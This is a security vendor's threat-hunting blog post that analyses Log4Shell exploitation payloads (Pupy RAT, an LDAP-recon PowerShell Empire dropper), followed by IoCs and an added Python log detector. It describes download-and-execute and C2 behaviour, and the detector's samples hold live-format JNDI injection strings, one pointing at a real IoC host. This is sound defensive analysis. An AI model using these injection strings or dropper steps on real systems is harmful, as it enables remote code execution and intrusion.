# Shining a Light on Log4j Exploit Payloads

By [Oded Awaskar](https://www.paloaltonetworks.com/blog/author/oded-awaskar/?ts=markdown "Posts by Oded Awaskar"), [Itay Gamliel](https://www.paloaltonetworks.com/blog/author/itay-gamliel/?ts=markdown "Posts by Itay Gamliel"), [Veronika Senderovych](https://www.paloaltonetworks.com/blog/author/veronika-senderovych/?ts=markdown "Posts by Veronika Senderovych") and [Daniela Shalev](https://www.paloaltonetworks.com/blog/author/daniela-shalev/?ts=markdown "Posts by Daniela Shalev")

Dec 22, 2021

Over the past 10 days, the Cortex XDR Managed Threat Hunting team observed a significant number of attempts to exploit the Log4Shell vulnerability. We've been especially interested in the sophistication of a certain set of exploit attempts and dropped payloads, which we describe below.

In this post, we deep-dive into a few examples of payloads collected and analyzed by the [Cortex XDR Managed Threat Hunting](https://www.paloaltonetworks.com/cortex/managed-threat-hunting) experts. Not only were these payloads spotted in very few exploitation attempts, but they are also not your everyday fire-and-forget type of payloads like cryptocurrency miners and botnets.

Among the payloads found are:

* [Pupy RAT](https://attack.mitre.org/software/S0192/)
* LDAP Scanner and [PowerShell Empire](https://attack.mitre.org/software/S0363/) Dropper

## Attack Trends in the Wild

As the graph below shows, the Managed Threat Hunting team spotted a large number of attacks following the day of the vulnerability disclosure. The graph shows attempts per day, observed over both the Cortex XDR and Next-Generation Firewall datasets, for the past 10 days.

*Figure 1. Log4Shell exploitation attempts trend graph over the past 10 days.*

When breaking down the events by country of origin, we noticed that most of the attacks originated from the United States, Germany and Russia.
With that being said, we recognize that the attackers might leverage proxy servers and VPNs located in those countries to hide their actual physical locations.

![Figure 2. World heatmap of source IP addresses.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-112.png)

*Figure 2. World heatmap of source IP addresses.*

The Managed Threat Hunting team worked to find the needles in the haystack, hunting for interesting payloads spotted in the wild. The team downloaded each malicious resource referenced in the malicious User-Agent requests and carefully attributed each one to a specific malware family. While most of the payloads are pretty standard and were attributed to botnets and cryptocurrency miners, listed below are a couple of interesting payloads that stood out among the rest.

## Attack Vector Overview

We encountered 51,500 exploitation attempts, broken into 442 unique, malicious User-Agent strings. When we tried to access the malicious servers included in the User-Agent strings, 98% of them were already down. However, we were able to successfully download 11 attack payloads.

## Payloads in the Wild

While observing adversaries' attempts to exploit this vulnerability in our customers' environments, we mostly encountered cryptominers and infamous botnets like [Mirai](https://unit42.paloaltonetworks.com/tag/mirai/) and Hakai. When investigating some of the payloads, the Cortex Managed Threat Hunting team discovered a couple that stood out from the others because of how rarely they appeared in our User-Agent collection.

In this section, we will explore two different observed payloads:

1. Pupy RAT - Linux
2. LDAP Scanner and PowerShell Empire Dropper - Windows

### Payload No. 1 -- Pupy RAT

**Pupy RAT** is an open-source, cross-platform, multi-function remote access trojan (RAT) and post-exploitation tool written mainly in Python.
One of the malicious User-Agent strings that caught our eye was:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-113.png)

Unlike most of the User-Agents observed, the attackers included the remote server address after a legitimate User-Agent, in an attempt to hide the malicious reference and possibly evade detection.

When making a request to

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-114.png)

we were able to retrieve a compiled Java class that contained a Base64-encoded command:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-115.png)

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-116.png)

*Figure 3. Decompiled Java class.*

After decoding the above-mentioned string, we identified a **wget** command attempting to download a file from a remote server and then execute it:

![Figure 4. Decoding Base64 with CyberChef.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-117.png)

*Figure 4. Decoding Base64 with CyberChef.*

When making a request to the above-mentioned remote server, we were able to retrieve the following bash script:

![Figure 5. Malicious bash script.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-118.png)

*Figure 5. Malicious bash script.*

The main purpose of the malicious bash script is to:

1. Maintain persistence by changing attributes of relevant files, verifying that directories needed later exist and implementing other persistence mechanisms depending on kernel version and execution permissions.
2. Download an ELF executable from **http://api\[.\]api-alipay\[.\]com/kworkerqxnz** and save it to the file system as **/lib/ntpd** or **/var/tmp/krowker**, again depending on the execution permissions.
3. Run the executable and clean all of the relevant logs.

The malware (kworker process) communicates with host 92\[.\]118\[.\]189\[.\]140 on port 443.

![Figure 6. Example of a malicious executable’s causality chain in Cortex XDR deployed with a detect-only profile.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-119.png)

*Figure 6. Example of a malicious executable's causality chain in Cortex XDR deployed with a detect-only profile.*

After examining the above payload, we attributed it to Pupy RAT:

![Figure 7. IDA function view of Pupy RAT.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-120.png)

*Figure 7. IDA function view of Pupy RAT.*

### Payload No. 2 -- LDAP Scanner and PowerShell Empire Downloader

PowerShell Empire is a PowerShell-based post-exploitation infrastructure. It can run multiple payloads on the infected host, such as keyloggers or Mimikatz, and also features a handful of capabilities for lateral movement.

An LDAP scan is a process of gathering information about all of the entities connected to a domain. That way, attackers can determine whether a domain has potentially interesting hosts before deploying more sophisticated payloads.

As most Log4j instances are part of software installed on Linux-based servers, many of the payloads we analyzed target Linux. However, we also observed a payload targeting Windows.

In this example, we downloaded a compiled Java class originating from the User-Agent:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-121.png)

![Figure 8. Decompiled Java class.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-122.png)

*Figure 8. Decompiled Java class.*

Upon execution, the script will attempt to identify the machine's operating system. If the targeted host is running any Windows-based OS, the malware initiates a PowerShell instance and executes an LDAP query in order to get a list of domain computers that logged in over the past 100 days.
The final stage sends the collected data to the C2 server: **http://45.146\[.\]164.160:8085/r?os=**

![Figure 9. PowerShell LDAP reconnaissance.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-123.png)

*Figure 9. PowerShell LDAP reconnaissance.*

Although this sample may not seem very sophisticated, as it only performs Active Directory reconnaissance, it is quite a smart technique: the threat actor first identifies appropriate victims and only then delivers the actual payload.

While pivoting on the suspected C2 server (**45.146\[.\]164.160**), we were able to identify a PHP page communicating with two suspicious PowerShell scripts (ps.ps1 and 1.ps1). These scripts are Base64-encoded one-liners and are used to download PowerShell Empire stagers.

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-124.png)

*Figure 10. Suspicious Base64 encoded PowerShell one-liners in the files.*

![Figure 11. Encoded PowerShell command downloading PowerShell Empire.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-125.png)

*Figure 11. Encoded PowerShell command downloading PowerShell Empire.*

## Closing Notes

High-severity remote code execution CVEs are becoming part of the infosec community's monthly routine; it is no longer considered rare and "exciting" when a CVE with a >9 CVSS score is published. This may translate into indifference and only a minor sense of urgency when it comes to patching the vulnerability.

We as a community must remember that threat actors will take advantage of these vulnerabilities as soon as a public POC is available. While these threat actors mostly focus on deploying "low-risk" malware, like cryptominers and botnets, our goal with this research is to emphasize that these vulnerabilities can also be used to deploy more sophisticated malware.
More sophisticated malware usually suggests a competent threat actor behind it, one that is willing to invest proper time in reconnaissance and lateral movement before taking actions on objectives.

It is recommended that you follow the mitigations described in the "[Conclusion](https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/#conclusion)" section of the Palo Alto Networks [Unit 42 analysis of the Apache log4j vulnerability](https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/), and immediately patch any potentially affected host.

You may also refer to our previously published blog post about [hunting for the Log4j assets and exploitation attempts in your cloud and on-premises environments](https://www.paloaltonetworks.com/blog/security-operations/hunting-for-log4j-cve-2021-44228-log4shell-exploit-activity/).

We wish you happy hunting and safe, happy holidays!

## Indicators of Compromise (IoCs) List

| **Payload** | **Description** | **IoC** |
|--------------|---------------------------------------|------------------------------------------------------------------|
| Pupy RAT | Pupy ELF SHA256 | 1506198201ed338520b98955a93e5df4f978ee550d51c19c1a7aed03e7d5fd91 |
| Pupy RAT | 1st Stage bash script Download | http://92.118.189\[.\]197/kswapdqxnz |
| Pupy RAT | Java Compiled Class Download | ldap://92\[.\]118\[.\]189\[.\]140:1389/kj9hgj |
| Pupy RAT | Pupy RAT Download | http://api.api-alipay\[.\]com/kworkerqxnz |
| LDAP Scanner | C2 Server | 45\[.\]146.164.16:8085 |
| LDAP Scanner | Java Compiled Class Download | 45\[.\]146.164.160:1389/t |
| LDAP Scanner | Java Compiled Class Sha256 | d4eefe1f6b79c03f1f0e99ad665467e446db3474874972d511eebfd57822bf44 |
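
The User-Agent placement described for the Pupy RAT request, and the callback endpoints in the IoC table, can be hunted for in web access logs. The Python below is an added example, not code from the original post or from Cortex XDR; it assumes Combined Log Format, its function names are hypothetical, and the log lines are constructed (source and unknown-callback addresses use documentation ranges). It finds a JNDI lookup anywhere in the User-Agent field, records whether ordinary browser text precedes it, and matches the callback host and port against two endpoints from the table, refanged at run time.

```python
import re
from urllib.parse import urlsplit

# Callback endpoints from this post's IoC table, kept defanged as published.
DEFANGED_IOCS = ["ldap://92[.]118[.]189[.]140:1389/kj9hgj", "45[.]146.164.160:1389/t"]

# Combined Log Format (assumed); the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A JNDI lookup anywhere in the header value, not only at its start.
JNDI_RE = re.compile(r"\$\{jndi:(?P<url>[a-z]+://[^}\s]+)\}", re.IGNORECASE)


def refang(ioc):
    """Undo the [.] defanging used in the IoC table."""
    return ioc.replace("[.]", ".")


def endpoint(value):
    """Return (host, port) for a URL or a bare host:port/path indicator."""
    if "://" not in value:
        value = "//" + value
    try:
        parts = urlsplit(value)
        return parts.hostname, parts.port
    except ValueError:  # malformed host or port in the logged lookup
        return None, None


KNOWN_ENDPOINTS = {endpoint(refang(i)) for i in DEFANGED_IOCS}


def inspect_line(line):
    """Return a finding dict for a log line carrying a JNDI lookup, else None."""
    entry = LOG_RE.match(line.strip())
    if not entry:
        return None
    ua = entry.group("ua")
    hit = JNDI_RE.search(ua)
    if not hit:
        return None
    host, port = endpoint(hit.group("url"))
    return {
        "src": entry.group("src"),
        "callback": hit.group("url"),
        "host": host,
        "port": port,
        # True when ordinary User-Agent text precedes the lookup, the
        # placement this post describes for the Pupy RAT request.
        "appended_to_ua": bool(ua[:hit.start()].strip()),
        "known_ioc": (host, port) in KNOWN_ENDPOINTS,
    }


def sample_lines():
    """Constructed access-log lines, not captured traffic."""
    browser = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
    ioc_url = refang(DEFANGED_IOCS[0])
    fmt = '{src} - - [20/Dec/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "{ua}"'
    return [
        fmt.format(src="198.51.100.7", ua=browser),
        fmt.format(src="198.51.100.8", ua="${jndi:ldap://203.0.113.10:1389/a}"),
        fmt.format(src="198.51.100.9", ua=browser + " ${jndi:" + ioc_url + "}"),
    ]


if __name__ == "__main__":
    for line in sample_lines():
        finding = inspect_line(line)
        if finding:
            print(finding)
```

A rule that only inspects the start of the User-Agent value would miss the third sample line, which is why the search covers the whole field.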